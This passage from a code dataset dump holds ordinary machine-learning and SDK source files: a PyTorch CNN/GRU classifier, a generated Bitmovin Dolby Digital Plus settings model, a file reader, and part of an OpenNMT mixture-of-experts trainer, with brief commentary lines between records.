nn.Conv1d(in_channel,out_channel,1,stride=2)\n self.conv1 = nn.Conv1d(in_channel,out_channel,3,padding = 1)\n self.conv2 = nn.Conv1d(out_channel,out_channel,3,padding = 1)\n self.conv3 = nn.Conv1d(out_channel,out_channel,25,2,padding = 12)\n self.bn1 = nn.BatchNorm1d(in_channel)\n self.bn2 = nn.BatchNorm1d(out_channel)\n self.bn3 = nn.BatchNorm1d(out_channel)\n self.se = SEBlock(out_channel)\n self.cam = CAMBlock()\n self.relu = nn.ReLU(True)\n self.dropout = nn.Dropout(0.2)\n\n def forward(self,x):\n shortcut = self.convt(x)\n x = self.bn1(x)\n x = self.conv1(x)\n x = self.relu(x)\n x = self.bn2(x)\n x = self.conv2(x)\n x = self.relu(x)\n x = self.bn3(x)\n x = self.conv3(x)\n x += shortcut\n x = self.relu(x)\n x = self.se(x)\n x = self.cam(x)\n x = self.dropout(x)\n \n return x\n\nclass CNN(nn.Module):\n\n def __init__(self):\n super(CNN,self).__init__()\n self.conv1 = CNNBlock(1, 64)\n self.conv2 = CNNBlock(64, 128)\n self.conv3 = CNNBlock(128, 128)\n self.conv4 = CNNBlock(128, 128)\n self.conv5 = CNNBlock(128, 128)\n self.gru = nn.GRU(128, 128,batch_first=True,bidirectional=True)\n self.relu = nn.ReLU(True)\n self.linear_unit = nn.Sequential(\n nn.Linear(256, 128),\n nn.ReLU(True),\n nn.Dropout(0.1),\n nn.Linear(128, 64),\n nn.ReLU(True),\n nn.Dropout(0.1),\n nn.Linear(64, 2),\n nn.Softmax(-1)\n )\n\n def forward(self,x):\n batch_size = x.size(0)\n x = x.view(-1,1,1000)\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = x.permute([0,2,1])\n _,h = self.gru(x)\n h = self.relu(h.permute([1,0,2]))\n x = h.reshape(h.size(0),-1)\n x = self.linear_unit(x)\n return x\n\nclass RNN(nn.Module):\n\n def __init__(self):\n super(RNN,self).__init__()\n self.gru1 = nn.GRU(512, 128,batch_first=True,bidirectional=True)\n self.relu = nn.ReLU(False)\n self.dropout = nn.Dropout(0.2)\n self.linear1 = nn.Linear(256,128)\n self.linear2 = nn.Linear(128,2)\n self.softmax = nn.Softmax(-1)\n\n def forward(self,x):\n x,h = self.gru1(x)\n x = self.relu(x)\n x = self.relu(self.linear1(x))\n x = self.dropout(x)\n x = self.softmax(self.linear2(x))\n return x\n\n\n\nif __name__ == '__main__':\n model = CNN()\n x = torch.rand(128,1000)\n y = model(x)\n print(y.size())\n # model = RNN()\n # x = 
torch.rand(24,30,512)\n # y = model(x)\n # print(y.size())","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
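+
+Both attention gates in the model above (SEBlock over channels, CAMBlock over positions) end in a sigmoid and multiply back onto their input, so they are shape-preserving by construction. A quick check, assuming SEBlock from the entry is importable:
+
+import torch
+
+se = SEBlock(64)
+x = torch.rand(8, 64, 250)     # batch x channels x length
+assert se(x).shape == x.shape  # the gate only rescales channels, never reshapes
+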
+{"seq_id":"218204039","text":"# coding: utf-8\n\nfrom enum import Enum\nfrom six import string_types, iteritems\nfrom bitmovin_api_sdk.common.poscheck import poscheck_model\nfrom bitmovin_api_sdk.models.dolby_digital_plus_surround_mode import DolbyDigitalPlusSurroundMode\nimport pprint\nimport six\n\n\nclass DolbyDigitalPlusBitstreamInfo(object):\n @poscheck_model\n def __init__(self,\n surround_mode=None,\n surround_ex_mode=None):\n # type: (DolbyDigitalPlusSurroundMode, DolbyDigitalPlusSurroundMode) -> None\n\n self._surround_mode = None\n self._surround_ex_mode = None\n self.discriminator = None\n\n if surround_mode is not None:\n self.surround_mode = surround_mode\n if surround_ex_mode is not None:\n self.surround_ex_mode = surround_ex_mode\n\n @property\n def openapi_types(self):\n types = {\n 'surround_mode': 'DolbyDigitalPlusSurroundMode',\n 'surround_ex_mode': 'DolbyDigitalPlusSurroundMode'\n }\n\n return types\n\n @property\n def attribute_map(self):\n attributes = {\n 'surround_mode': 'surroundMode',\n 'surround_ex_mode': 'surroundExMode'\n }\n return attributes\n\n @property\n def surround_mode(self):\n # type: () -> DolbyDigitalPlusSurroundMode\n \"\"\"Gets the surround_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This parameter indicates to a decoder whether the two‐channel encoded bitstream contains a Dolby Surround (Lt/Rt) program that requires Dolby Pro Logic decoding. When downmixing to stereo from a multichannel input, set this value according to the type of downmix performed (Lt/Rt: `ENABLED`, Lo/Ro: `DISABLED`). When transcoding a stereo Dolby Digital, Dolby Digital Plus, or Dolby E input, the value must be passed through from the input bitstream to the output bitstream. When transcoding a third-party stereo input to stereo Dolby Digital set the value to `NOT_INDICATED`. \n\n :return: The surround_mode of this DolbyDigitalPlusBitstreamInfo.\n :rtype: DolbyDigitalPlusSurroundMode\n \"\"\"\n return self._surround_mode\n\n @surround_mode.setter\n def surround_mode(self, surround_mode):\n # type: (DolbyDigitalPlusSurroundMode) -> None\n \"\"\"Sets the surround_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This parameter indicates to a decoder whether the two‐channel encoded bitstream contains a Dolby Surround (Lt/Rt) program that requires Dolby Pro Logic decoding. When downmixing to stereo from a multichannel input, set this value according to the type of downmix performed (Lt/Rt: `ENABLED`, Lo/Ro: `DISABLED`). When transcoding a stereo Dolby Digital, Dolby Digital Plus, or Dolby E input, the value must be passed through from the input bitstream to the output bitstream. When transcoding a third-party stereo input to stereo Dolby Digital set the value to `NOT_INDICATED`. \n\n :param surround_mode: The surround_mode of this DolbyDigitalPlusBitstreamInfo.\n :type: DolbyDigitalPlusSurroundMode\n \"\"\"\n\n if surround_mode is not None:\n if not isinstance(surround_mode, DolbyDigitalPlusSurroundMode):\n raise TypeError(\"Invalid type for `surround_mode`, type has to be `DolbyDigitalPlusSurroundMode`\")\n\n self._surround_mode = surround_mode\n\n @property\n def surround_ex_mode(self):\n # type: () -> DolbyDigitalPlusSurroundMode\n \"\"\"Gets the surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This is used to identify the encoded audio as material encoded in Dolby Digital Surround EX. This parameter is used only if the encoded audio has two surround channels. 
An amplifier or receiver with Dolby Digital Surround EX decoding can use this parameter as a flag to switch the decoding on or off automatically. The behavior is similar to that of the `surroundMode` parameter. \n\n :return: The surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n :rtype: DolbyDigitalPlusSurroundMode\n \"\"\"\n return self._surround_ex_mode\n\n @surround_ex_mode.setter\n def surround_ex_mode(self, surround_ex_mode):\n # type: (DolbyDigitalPlusSurroundMode) -> None\n \"\"\"Sets the surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This is used to identify the encoded audio as material encoded in Dolby Digital Surround EX. This parameter is used only if the encoded audio has two surround channels. An amplifier or receiver with Dolby Digital Surround EX decoding can use this parameter as a flag to switch the decoding on or off automatically. The behavior is similar to that of the `surroundMode` parameter. \n\n :param surround_ex_mode: The surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n :type: DolbyDigitalPlusSurroundMode\n \"\"\"\n\n if surround_ex_mode is not None:\n if not isinstance(surround_ex_mode, DolbyDigitalPlusSurroundMode):\n raise TypeError(\"Invalid type for `surround_ex_mode`, type has to be `DolbyDigitalPlusSurroundMode`\")\n\n self._surround_ex_mode = surround_ex_mode\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if value is None:\n continue\n if isinstance(value, list):\n if len(value) == 0:\n continue\n result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, \"to_dict\") else x for x in value]]\n elif hasattr(value, \"to_dict\"):\n result[self.attribute_map.get(attr)] = value.to_dict()\n elif isinstance(value, Enum):\n result[self.attribute_map.get(attr)] = value.value\n elif isinstance(value, dict):\n result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, \"to_dict\") else v) for (k, v) in value.items()}\n else:\n result[self.attribute_map.get(attr)] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DolbyDigitalPlusBitstreamInfo):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitmovin_api_sdk/models/dolby_digital_plus_bitstream_info.py","file_name":"dolby_digital_plus_bitstream_info.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
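+
+to_dict() in the generated model above walks openapi_types, skips unset attributes, and renames keys through attribute_map, so the wire format uses camelCase. An illustrative round trip; the ENABLED member is taken from the docstrings, and its serialized .value is assumed to be the string 'ENABLED':
+
+info = DolbyDigitalPlusBitstreamInfo(
+    surround_mode=DolbyDigitalPlusSurroundMode.ENABLED)
+print(info.to_dict())  # expected: {'surroundMode': 'ENABLED'}
+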
+{"seq_id":"294389751","text":"from xai.python.file import File\nimport json\n\nclass Eye():\n '''Reads json files and plain-text sentence files.'''\n def __init__(self, filename=None):\n self.filename = filename\n\n #\n def read_json(self, filename):\n '''Load a json file and return the parsed data.'''\n if filename:\n self.filename = filename\n with open(self.filename) as file:\n jsondata = json.load(file)\n return jsondata\n #\n def read_sent(self, filename):\n '''Read a text file and return its lines.'''\n if filename:\n self.filename = filename\n with open(self.filename) as file:\n sents = file.readlines()\n return sents\n\n# Run main function by default\nif __name__ == \"__main__\":\n file = File()\n eye = Eye()\n #==================================================================\n # jsondata\n filename = file.pwd + '/xai/words/jsonword/test.dat'\n jsondata = eye.read_json(filename)\n print(jsondata)\n #==================================================================\n # sent\n filename = file.pwd + '/xai/sents/test.dat'\n sents = eye.read_sent(filename)\n print(sents)","sub_path":"xai/body/eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
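+
+The two readers above reduce to one-liners with pathlib; a sketch with placeholder paths:
+
+import json
+from pathlib import Path
+
+jsondata = json.loads(Path("xai/words/jsonword/test.dat").read_text())
+sents = Path("xai/sents/test.dat").read_text().splitlines(keepends=True)
+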
+{"seq_id":"574747445","text":"\"\"\"\n This is the loadable seq2seq trainer library that is\n in charge of training details, loss compute, and statistics.\n See train.py for a use case of this library.\n\n Note: To make this a general library, we implement *only*\n mechanism things here(i.e. what to do), and leave the strategy\n things to users(i.e. how to do it). Also see train.py(one of the\n users of this library) for the strategy things we do.\n\"\"\"\n\nimport torch\nimport traceback\n\nimport onmt.utils\nfrom onmt.utils.logging import logger\n\ntorch.autograd.set_detect_anomaly(True)\n\n\ndef build_trainer(opt, device_id, model, fields, optim, model_saver=None):\n \"\"\"\n Simplify `Trainer` creation based on user `opt`s*\n\n Args:\n opt (:obj:`Namespace`): user options (usually from argument parsing)\n model (:obj:`onmt.models.NMTModel`): the model to train\n fields (dict): dict of fields\n optim (:obj:`onmt.utils.Optimizer`): optimizer used during training\n data_type (str): string describing the type of data\n e.g. \"text\", \"img\", \"audio\"\n model_saver(:obj:`onmt.models.ModelSaverBase`): the utility object\n used to save the model\n \"\"\"\n\n tgt_field = dict(fields)[\"tgt\"].base_field\n train_loss = onmt.utils.loss.build_loss_compute(model, tgt_field, opt)\n valid_loss = onmt.utils.loss.build_loss_compute(\n model, tgt_field, opt, train=False)\n\n trunc_size = opt.truncated_decoder # Badly named...\n shard_size = opt.max_generator_batches if opt.model_dtype == 'fp32' else 0\n norm_method = opt.normalization\n accum_count = opt.accum_count\n accum_steps = opt.accum_steps\n n_gpu = opt.world_size\n average_decay = opt.average_decay\n average_every = opt.average_every\n dropout = opt.dropout\n dropout_steps = opt.dropout_steps\n if device_id >= 0:\n gpu_rank = opt.gpu_ranks[device_id]\n else:\n gpu_rank = 0\n n_gpu = 0\n gpu_verbose_level = opt.gpu_verbose_level\n\n earlystopper = onmt.utils.EarlyStopping(\n opt.early_stopping, scorers=onmt.utils.scorers_from_opts(opt)) \\\n if opt.early_stopping > 0 else None\n\n source_noise = None\n if len(opt.src_noise) > 0:\n src_field = dict(fields)[\"src\"].base_field\n corpus_id_field = dict(fields).get(\"corpus_id\", None)\n if corpus_id_field is not None:\n ids_to_noise = corpus_id_field.numericalize(opt.data_to_noise)\n else:\n ids_to_noise = None\n source_noise = onmt.modules.source_noise.MultiNoise(\n opt.src_noise,\n opt.src_noise_prob,\n ids_to_noise=ids_to_noise,\n pad_idx=src_field.pad_token,\n end_of_sentence_mask=src_field.end_of_sentence_mask,\n word_start_mask=src_field.word_start_mask,\n device_id=device_id\n )\n\n report_manager = onmt.utils.build_report_manager(opt, gpu_rank)\n trainer = onmt.Trainer(model, train_loss, valid_loss, optim, trunc_size,\n shard_size, norm_method,\n accum_count, accum_steps,\n n_gpu, gpu_rank,\n gpu_verbose_level, report_manager,\n with_align=True if opt.lambda_align > 0 else False,\n model_saver=model_saver if gpu_rank == 0 else None,\n average_decay=average_decay,\n average_every=average_every,\n model_dtype=opt.model_dtype,\n earlystopper=earlystopper,\n dropout=dropout,\n dropout_steps=dropout_steps,\n source_noise=source_noise,\n num_experts=opt.num_experts,\n learned_prior=opt.learned_prior,\n sampling_z=opt.sampling_z,\n soft_selection=opt.soft_selection,\n weighted_grad=opt.weighted_grad,\n vocab=tgt_field.vocab)\n return trainer\n\n\nclass Trainer(object):\n \"\"\"\n Class that controls the training process.\n\n Args:\n model(:py:class:`onmt.models.model.NMTModel`): translation 
model\n to train\n train_loss(:obj:`onmt.utils.loss.LossComputeBase`):\n training loss computation\n valid_loss(:obj:`onmt.utils.loss.LossComputeBase`):\n training loss computation\n optim(:obj:`onmt.utils.optimizers.Optimizer`):\n the optimizer responsible for update\n trunc_size(int): length of truncated back propagation through time\n shard_size(int): compute loss in shards of this size for efficiency\n data_type(string): type of the source input: [text|img|audio]\n norm_method(string): normalization methods: [sents|tokens]\n accum_count(list): accumulate gradients this many times.\n accum_steps(list): steps for accum gradients changes.\n report_manager(:obj:`onmt.utils.ReportMgrBase`):\n the object that creates reports, or None\n model_saver(:obj:`onmt.models.ModelSaverBase`): the saver is\n used to save a checkpoint.\n Thus nothing will be saved if this parameter is None\n \"\"\"\n\n def __init__(self, model, train_loss, valid_loss, optim,\n trunc_size=0, shard_size=32,\n norm_method=\"sents\", accum_count=[1],\n accum_steps=[0],\n n_gpu=1, gpu_rank=1, gpu_verbose_level=0,\n report_manager=None, with_align=False, model_saver=None,\n average_decay=0, average_every=1, model_dtype='fp32',\n earlystopper=None, dropout=[0.3], dropout_steps=[0],\n source_noise=None, num_experts=1, learned_prior=False, \n sampling_z=False, soft_selection=False, weighted_grad=False, \n vocab=None):\n # Basic attributes.\n self.model = model\n self.train_loss = train_loss\n self.valid_loss = valid_loss\n self.optim = optim\n self.trunc_size = trunc_size\n self.shard_size = shard_size\n self.norm_method = norm_method\n self.accum_count_l = accum_count\n self.accum_count = accum_count[0]\n self.accum_steps = accum_steps\n self.n_gpu = n_gpu\n self.gpu_rank = gpu_rank\n self.gpu_verbose_level = gpu_verbose_level\n self.report_manager = report_manager\n self.with_align = with_align\n self.model_saver = model_saver\n self.average_decay = average_decay\n self.moving_average = None\n self.average_every = average_every\n self.model_dtype = model_dtype\n self.earlystopper = earlystopper\n self.dropout = dropout\n self.dropout_steps = dropout_steps\n self.source_noise = source_noise\n self.num_experts = num_experts\n self.learned_prior = learned_prior\n self.sampling_z = sampling_z\n self.soft_selection = soft_selection\n self.weighted_grad = weighted_grad\n self.vocab = vocab\n\n for i in range(len(self.accum_count_l)):\n assert self.accum_count_l[i] > 0\n if self.accum_count_l[i] > 1:\n assert self.trunc_size == 0, \\\n \"\"\"To enable accumulated gradients,\n you must disable target sequence truncating.\"\"\"\n\n # Set model in training mode.\n self.model.train()\n\n def _accum_count(self, step):\n for i in range(len(self.accum_steps)):\n if step > self.accum_steps[i]:\n _accum = self.accum_count_l[i]\n return _accum\n\n def _maybe_update_dropout(self, step):\n for i in range(len(self.dropout_steps)):\n if step > 1 and step == self.dropout_steps[i] + 1:\n self.model.update_dropout(self.dropout[i])\n logger.info(\"Updated dropout to %f from step %d\"\n % (self.dropout[i], step))\n\n def _accum_batches(self, iterator):\n batches = []\n normalization_x2y = normalization_y2x = 0\n self.accum_count = self._accum_count(self.optim.training_step)\n for batch in iterator:\n batches.append(batch)\n if self.norm_method == \"tokens\":\n num_tokens = batch.tgt[0][1:, :, 0].ne(\n self.train_loss.padding_idx).sum()\n normalization_x2y += num_tokens.item()\n num_tokens = batch.src[0][1:, :, 0].ne(\n 
self.train_loss.padding_idx).sum()\n normalization_y2x += num_tokens.item()\n else:\n normalization_x2y += batch.batch_size\n normalization_y2x += batch.batch_size\n if len(batches) == self.accum_count:\n yield batches, normalization_x2y, normalization_y2x\n self.accum_count = self._accum_count(self.optim.training_step)\n batches = []\n normalization_x2y = normalization_y2x = 0\n if batches:\n yield batches, normalization_x2y, normalization_y2x\n\n def _update_average(self, step):\n if self.moving_average is None:\n copy_params = [params.detach().float()\n for params in self.model.parameters()]\n self.moving_average = copy_params\n else:\n average_decay = max(self.average_decay,\n 1 - (step + 1)/(step + 10))\n for (i, avg), cpt in zip(enumerate(self.moving_average),\n self.model.parameters()):\n self.moving_average[i] = \\\n (1 - average_decay) * avg + \\\n cpt.detach().float() * average_decay\n\n def train(self,\n train_iter,\n train_steps,\n save_checkpoint_steps=5000,\n valid_iter=None,\n valid_steps=10000):\n \"\"\"\n The main training loop by iterating over `train_iter` and possibly\n running validation on `valid_iter`.\n\n Args:\n train_iter: A generator that returns the next training batch.\n train_steps: Run training for this many iterations.\n save_checkpoint_steps: Save a checkpoint every this many\n iterations.\n valid_iter: A generator that returns the next validation batch.\n valid_steps: Run evaluation every this many iterations.\n\n Returns:\n The gathered statistics.\n \"\"\"\n if valid_iter is None:\n logger.info('Start training loop without validation...')\n else:\n logger.info('Start training loop and validate every %d steps...',\n valid_steps)\n\n total_stats = onmt.utils.Statistics(self.num_experts)\n report_stats = onmt.utils.Statistics(self.num_experts)\n self._start_report_manager(start_time=total_stats.start_time)\n\n for i, (batches, normalization_x2y, normalization_y2x) in enumerate(\n self._accum_batches(train_iter)):\n step = self.optim.training_step\n # UPDATE DROPOUT\n self._maybe_update_dropout(step)\n\n if self.gpu_verbose_level > 1:\n logger.info(\"GpuRank %d: index: %d\", self.gpu_rank, i)\n if self.gpu_verbose_level > 0:\n logger.info(\"GpuRank %d: reduce_counter: %d \\\n n_minibatch %d\"\n % (self.gpu_rank, i + 1, len(batches)))\n\n if self.n_gpu > 1:\n normalization_x2y = sum(onmt.utils.distributed\n .all_gather_list\n (normalization_x2y))\n normalization_y2x = sum(onmt.utils.distributed\n .all_gather_list\n (normalization_y2x))\n\n self._gradient_accumulation(\n batches, normalization_x2y, normalization_y2x, \n total_stats, report_stats)\n\n if self.average_decay > 0 and i % self.average_every == 0:\n self._update_average(step)\n\n report_stats = self._maybe_report_training(\n step, train_steps,\n self.optim.learning_rate(),\n report_stats)\n\n if valid_iter is not None and step % valid_steps == 0:\n if self.gpu_verbose_level > 0:\n logger.info('GpuRank %d: validate step %d'\n % (self.gpu_rank, step))\n valid_stats = self.validate(\n valid_iter, moving_average=self.moving_average)\n if self.gpu_verbose_level > 0:\n logger.info('GpuRank %d: gather valid stat \\\n step %d' % (self.gpu_rank, step))\n valid_stats = self._maybe_gather_stats(valid_stats)\n if self.gpu_verbose_level > 0:\n logger.info('GpuRank %d: report stat step %d'\n % (self.gpu_rank, step))\n self._report_step(self.optim.learning_rate(),\n step, valid_stats=valid_stats)\n # Run patience mechanism\n if self.earlystopper is not None:\n self.earlystopper(valid_stats, step)\n # If the 
patience has reached the limit, stop training\n if self.earlystopper.has_stopped():\n break\n\n if (self.model_saver is not None\n and (save_checkpoint_steps != 0\n and step % save_checkpoint_steps == 0)):\n self.model_saver.save(step, moving_average=self.moving_average)\n\n if train_steps > 0 and step >= train_steps:\n break\n\n if self.model_saver is not None:\n self.model_saver.save(step, moving_average=self.moving_average)\n return total_stats\n\n def validate(self, valid_iter, moving_average=None):\n \"\"\" Validate model.\n valid_iter: validate data iterator\n Returns:\n :obj:`nmt.Statistics`: validation loss statistics\n \"\"\"\n if moving_average:\n # swap model params w/ moving average\n # (and keep the original parameters)\n model_params_data = []\n for avg, param in zip(self.moving_average,\n self.model.parameters()):\n model_params_data.append(param.data)\n param.data = avg.data.half() if self.optim._fp16 == \"legacy\" \\\n else avg.data\n\n # Set model in validating mode.\n self.model.eval()\n\n with torch.no_grad():\n stats = onmt.utils.Statistics(self.num_experts)\n\n for batch in valid_iter:\n src, src_lengths = batch.src\n tgt, tgt_lengths = batch.tgt\n\n # get rz\n lprob_yz = self.get_lprob_yz_x(\n src, tgt, src_lengths, side='x2y') # B x K\n lprob_xz = self.get_lprob_yz_x(\n tgt, src, tgt_lengths, side='y2x') # B x K\n rz1 = torch.nn.functional.softmax(lprob_yz, dim=1)\n rz2 = torch.nn.functional.softmax(lprob_xz, dim=1)\n rz = torch.sqrt(rz1 * rz2)\n winners = rz.max(dim=1)[1]\n\n # get x2y stats\n loss_x2y, stat_dict_x2y = self.get_loss_stats(\n src, tgt, src_lengths, winners, side='x2y')\n # get y2x stats\n loss_y2x, stat_dict_y2x = self.get_loss_stats(\n tgt, src, tgt_lengths, winners, side='y2x')\n \n # batch stats\n batch_stats_x2y = onmt.utils.Statistics(\n self.num_experts, loss=loss_x2y.item(),\n r=rz.sum(dim=0).cpu().numpy(), **stat_dict_x2y)\n batch_stats_y2x = onmt.utils.Statistics(\n self.num_experts, loss=loss_y2x.item(),\n r=rz.sum(dim=0).cpu().numpy(), **stat_dict_y2x)\n\n # Update statistics.\n stats.update(batch_stats_x2y)\n stats.update(batch_stats_y2x)\n\n if moving_average:\n for param_data, param in zip(model_params_data,\n self.model.parameters()):\n param.data = param_data\n\n # Set model back to training mode.\n self.model.train()\n\n return stats\n \n def expert_index(self, i):\n return i + self.vocab.stoi['']\n\n def get_dec_in(self, dec_in, winners):\n dec_in_ = dec_in.clone()\n dec_in_[0, :, 0] = self.expert_index(winners)\n return dec_in_\n\n def get_loss_stats(self, x, y, xlen, winners, side='x2y', weight=None):\n \"\"\"get log p(y,z|x) tensor\n whether z is known or unknown\"\"\"\n\n enc, mem, _ = self.model.encoder(x, xlen)\n input_, target = y[:-1], y[1:]\n\n # hard selection loss\n dec_in = self.get_dec_in(input_, winners)\n loss, stat_dict = self._get_loss_y(\n dec_in, target, enc, mem, x, xlen, side=side, \n reduced_sum=True, weight=weight)\n \n # add prior loss to the loss above, if available\n if self.learned_prior:\n prior = (self.model.prior_x2y if side == 'x2y' else \n self.model.prior_y2x)\n ### excluding logsumexp\n # lprob_z = prior(mem, xlen) # -> B x K\n lprob_z = prior(mem.detach(), xlen) # -> B x K\n lprob_z_winner = lprob_z.gather(\n dim=-1, index=winners.unsqueeze(-1)) # -> B\n loss_z = - lprob_z_winner.sum()\n loss += loss_z\n \n # ### ???????? 
add xent\n    #     def _multinomial_xent(prob):\n    #         kl = - torch.exp(prob) * prob\n    #         return kl.sum()\n\n    #     loss += _multinomial_xent(lprob_z)\n\n\n        return loss, stat_dict\n\n    def _get_loss_y(self, dec_in, target, enc_state, memory_bank, \n                    x, lengths, side='x2y', reduced_sum=False, weight=None):\n        \"\"\"log p(y|x,z) when z is specified in `dec_in`\"\"\"\n        decoder = (self.model.decoder_x2y if side == 'x2y' else \n                   self.model.decoder_y2x)\n\n        decoder.init_state(x, enc_state, memory_bank)\n        dec_out, _ = decoder(dec_in, memory_bank, \n                             memory_lengths=lengths, \n                             with_align=self.with_align)\n\n        loss, num_correct, n_words = self.train_loss.compute_loss(\n            dec_out, target, reduced_sum=reduced_sum, get_stat=True, weight=weight)\n        stat_dict = {\n            'loss_%s' %side: loss.sum().item(),\n            'n_correct_%s' %side: num_correct,\n            'n_words_%s' %side: n_words}\n        return loss, stat_dict\n\n    def _get_lprob_y(self, dec_in, target, enc_state, memory_bank, \n                     x, lengths, side='x2y'):\n        B = len(lengths)\n        loss, stat_dict = self._get_loss_y(\n            dec_in, target, enc_state, memory_bank, x, lengths, side=side)\n        loss = loss.view(B, -1)\n        lprob = -loss.sum(dim=1, keepdim=True) # -> B x 1\n        return lprob\n\n    def get_lprob_yz_x(self, x, y, xlen, winners=None, side='x2y'):\n        \"\"\"get log p(y,z|x) tensor\n        whether z is known or unknown\"\"\"\n        enc, mem, _ = self.model.encoder(x, xlen)\n        input_, target = y[:-1], y[1:]\n        if winners is None:\n            lprob_y = []\n            for i in range(self.num_experts):\n                dec_in = self.get_dec_in(input_, i)\n                lprob_y_k = self._get_lprob_y(\n                    dec_in, target, enc, mem, x, xlen, side=side)\n                lprob_y.append(lprob_y_k)\n            lprob_y = torch.cat(lprob_y, dim=1) # -> B x K\n        else:\n            dec_in = self.get_dec_in(input_, winners)\n            lprob_y = self._get_lprob_y(\n                dec_in, target, enc, mem, x, xlen, side=side) # -> B\n\n        lprob_yz = lprob_y\n        if self.learned_prior:\n            prior = (self.model.prior_x2y if side == 'x2y' else \n                     self.model.prior_y2x)\n            # lprob_z = prior(mem, xlen) # -> B x K\n            lprob_z = prior(mem.detach(), xlen) # -> B x K\n            \n            if winners is not None:\n                # pick the prior term of the chosen expert\n                lprob_z = lprob_z.gather(dim=-1, index=winners.unsqueeze(-1))\n            \n            lprob_yz += lprob_z\n        \n        return lprob_yz\n\n    def _gradient_accumulation(self, true_batches, normalization_x2y, \n                               normalization_y2x, total_stats, report_stats):\n        if self.accum_count > 1:\n            self.optim.zero_grad()\n\n        for k, batch in enumerate(true_batches):\n\n            batch = self.maybe_noise_source(batch)\n\n            # 1. Load data.\n            src, src_lengths = batch.src\n            tgt, tgt_lengths = batch.tgt\n            report_stats.n_src_words += src_lengths.sum().item()\n            report_stats.n_tgt_words += tgt_lengths.sum().item()\n\n            # 2. 
F-prop all but generator.\n if self.accum_count == 1:\n self.optim.zero_grad()\n \n # compute responsibilities r = p(z|x,y)\n self.model.eval()\n with torch.no_grad():\n lprob_yz = self.get_lprob_yz_x(\n src, tgt, src_lengths, side='x2y') # B x K\n lprob_xz = self.get_lprob_yz_x(\n tgt, src, tgt_lengths, side='y2x') # B x K\n rz1 = torch.nn.functional.softmax(lprob_yz, dim=1)\n rz2 = torch.nn.functional.softmax(lprob_xz, dim=1)\n rz = torch.sqrt(rz1 * rz2) # posterior!\n self.model.train()\n\n assert not rz.requires_grad\n\n # compute loss\n if self.soft_selection:\n lprob_yz = self.get_lprob_yz_x(\n src, tgt, src_lengths, side='x2y') # B x K\n lprob_xz = self.get_lprob_yz_x(\n tgt, src, tgt_lengths, side='y2x') # B x K\n if self.weighted_grad:\n loss_yz = -LogSumExpMoE.apply(lprob_yz, rz1, 1).sum()\n loss_xz = -LogSumExpMoE.apply(lprob_xz, rz2, 1).sum()\n else:\n loss_yz = -torch.logsumexp(lprob_yz, dim=1).sum()\n loss_xz = -torch.logsumexp(lprob_xz, dim=1).sum()\n stat_dict_x2y = {\n 'loss_x2y': loss_yz.item(),\n 'n_words_x2y': (tgt_lengths - 1).sum().item()}\n stat_dict_y2x = {\n 'loss_y2x': loss_xz.item(),\n 'n_words_y2x': (src_lengths - 1).sum().item()}\n loss = loss_yz + loss_xz\n else:\n if self.learned_prior and self.sampling_z:\n winners = rz.multinomial(1).view(-1) # B\n else:\n winners = rz.max(dim=1)[1] # B\n \n weight = None\n if self.weighted_grad:\n weight = rz.gather(dim=-1, index=winners.unsqueeze(-1)) # B\n\n # loss: -log p(y|x,z) p(z|x) p(x|y,z)\n loss_x2y, stat_dict_x2y = self.get_loss_stats(\n src, tgt, src_lengths, winners, side='x2y', weight=weight)\n loss_y2x, stat_dict_y2x = self.get_loss_stats(\n tgt, src, tgt_lengths, winners, side='y2x', weight=weight)\n loss = loss_x2y + loss_y2x\n\n self.optim.backward(loss)\n stats = onmt.utils.Statistics(self.num_experts, \n loss=loss.item(),\n r=rz.sum(dim=0).cpu().numpy(),\n **stat_dict_x2y, **stat_dict_y2x)\n total_stats.update(stats)\n report_stats.update(stats)\n\n # 4. 
Update the parameters and statistics.\n if self.accum_count == 1:\n # Multi GPU gradient gather\n if self.n_gpu > 1:\n grads = [p.grad.data for p in self.model.parameters()\n if p.requires_grad\n and p.grad is not None]\n onmt.utils.distributed.all_reduce_and_rescale_tensors(\n grads, float(1))\n self.optim.step()\n\n # in case of multi step gradient accumulation,\n # update only after accum batches\n if self.accum_count > 1:\n if self.n_gpu > 1:\n grads = [p.grad.data for p in self.model.parameters()\n if p.requires_grad\n and p.grad is not None]\n onmt.utils.distributed.all_reduce_and_rescale_tensors(\n grads, float(1))\n self.optim.step()\n\n def _start_report_manager(self, start_time=None):\n \"\"\"\n Simple function to start report manager (if any)\n \"\"\"\n if self.report_manager is not None:\n if start_time is None:\n self.report_manager.start()\n else:\n self.report_manager.start_time = start_time\n\n def _maybe_gather_stats(self, stat):\n \"\"\"\n Gather statistics in multi-processes cases\n\n Args:\n stat(:obj:onmt.utils.Statistics): a Statistics object to gather\n or None (it returns None in this case)\n\n Returns:\n stat: the updated (or unchanged) stat object\n \"\"\"\n if stat is not None and self.n_gpu > 1:\n return onmt.utils.Statistics.all_gather_stats(stat)\n return stat\n\n def _maybe_report_training(self, step, num_steps, learning_rate,\n report_stats):\n \"\"\"\n 